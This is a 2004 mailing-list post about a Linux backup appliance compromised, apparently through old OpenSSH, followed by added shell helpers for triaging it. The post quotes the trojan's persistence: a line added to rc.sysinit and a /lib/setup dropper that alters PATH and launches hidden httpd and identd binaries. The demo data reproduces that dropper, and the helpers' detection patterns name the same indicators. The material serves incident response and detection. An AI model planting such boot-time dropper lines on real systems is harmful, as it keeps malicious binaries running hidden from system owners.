hacked through ssh

From: John (mcgowan_at_lynch2.com)
Date: 03/09/04

    Date: 9 Mar 2004 14:30:16 -0800


    I've got a D2D backup appliance that came preinstalled with a version
    of RH Linux. Not sure which version. However I am sure that it is
    running OpenSSH_3.1p1. This machine wouldn't boot up after a power
    (and UPS) failure, and in trying to get it running again we discovered
    that something had been compromised. The machine is behind a
    firewall, but unfortunately I had opened up SSL traffic to the entire
    outside world (to get some remote support from the appliance
    manufacturer). What we discovered today was the following.

    at the bottom of rc.sysinit, the following...
    # installing HTTPD
    /lib/setup

    And /lib/setup looked like this...
    PWD=`pwd`
    cd /lib
    export PATH=.:$PATH
    httpd >/dev/null
    cd /usr/lib
    identd & >/dev/null
    cd "$PWD"

    the httpd executable was also sitting in the lib directory and I
    believe did most of the damage.

    Is anybody familiar with this particular trojan?

    I'm 99% convinced (from searching google for half a day) that this was
    due to the old version of OpenSSH and the fact that I had SSH open
    to the outside world. But I have not encountered any real proof that
    what I'm looking at came from those mistakes. I already plan on
    completely re-installing the machine in question, but I don't want to
    do that if I have another hole that I'm not aware of that was the real
    source of my troubles.

    /John
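The post describes a classic persistence pattern: a line appended to rc.sysinit runs a dropper script which prepends "." to PATH and launches binaries hidden among the shared objects in /lib and /usr/lib. The following POSIX sh helpers are an added example for triaging a box like this; they are not from the original post or from any vendor. They grep an init script for the indicators visible above (direct execution of a file under /lib or /usr/lib, "." in PATH, bare httpd/identd invocations, the "installing HTTPD" comment) and list executables in a library directory that are not shared objects. All sample files are constructed in a temp directory to mirror what John found.

```shell
#!/bin/sh
# Added example, not code from the original post. Audits an init script and a
# library directory for the persistence indicators described in the post.
# Sample data below is constructed; real triage would point these at
# /etc/rc.d/rc.sysinit, /lib and /usr/lib on a mounted image of the disk.

# Print matching lines (with line numbers) from an init script.
# Exit status 0 = indicators found, 1 = nothing matched.
audit_init_script() {
    file="$1"
    hits=$(grep -nE \
        -e '^[[:space:]]*(/lib|/usr/lib)/[^/[:space:]]+[[:space:]]*$' \
        -e 'PATH=[^#]*\.(:|$)' \
        -e '(^|[[:space:]])(httpd|identd)[[:space:]]*(&|>|$)' \
        -e 'installing HTTPD' \
        "$file")
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 0
    fi
    return 1
}

# Number of indicator lines in a file (convenient for scripted checks).
count_indicators() {
    audit_init_script "$1" | grep -c .
}

# Executable regular files in a lib directory that are not named like
# shared objects, archives or the dynamic loader. Legitimate /lib contents
# are almost entirely *.so*; a standalone "httpd" or "setup" there stands out.
find_odd_executables() {
    for f in "$1"/*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        case "${f##*/}" in
            *.so|*.so.*|*.a|*.o|ld-*) continue ;;
        esac
        printf '%s\n' "$f"
    done
}

count_odd_executables() {
    find_odd_executables "$1" | grep -c .
}

# --- constructed demo data mirroring the post -------------------------------
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT

cat > "$demo_dir/rc.sysinit" <<'EOF'
# normal service startup
/sbin/ldconfig -n /lib
# installing HTTPD
/lib/setup
EOF

cat > "$demo_dir/setup" <<'EOF'
PWD=`pwd`
cd /lib
export PATH=.:$PATH
httpd >/dev/null
cd /usr/lib
identd & >/dev/null
cd "$PWD"
EOF

mkdir "$demo_dir/lib"
: > "$demo_dir/lib/libc.so.6"; chmod 755 "$demo_dir/lib/libc.so.6"
: > "$demo_dir/lib/httpd";     chmod 755 "$demo_dir/lib/httpd"
: > "$demo_dir/lib/setup";     chmod 755 "$demo_dir/lib/setup"

if [ -z "$AUDIT_NO_DEMO" ]; then
    echo "== indicators in rc.sysinit ==";   audit_init_script "$demo_dir/rc.sysinit"
    echo "== indicators in /lib/setup ==";   audit_init_script "$demo_dir/setup"
    echo "== odd executables in lib dir =="; find_odd_executables "$demo_dir/lib"
fi
```

Run against the constructed data, the first check flags the "installing HTTPD" comment and the bare `/lib/setup` call, the second flags the PATH change and the two daemon launches, and the directory scan reports `httpd` and `setup` while ignoring `libc.so.6`. On a real image, run this from a clean boot medium with the compromised filesystem mounted read-only, since the `httpd` binary itself may replace tools such as `ls`, `ps` or `grep` on the host.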
